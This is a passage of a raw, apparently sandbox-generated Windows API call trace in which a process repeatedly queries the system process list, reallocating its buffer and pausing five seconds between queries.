SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.437] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.466] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.473] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.480] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.487] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.494] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.532] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.541] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.549] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 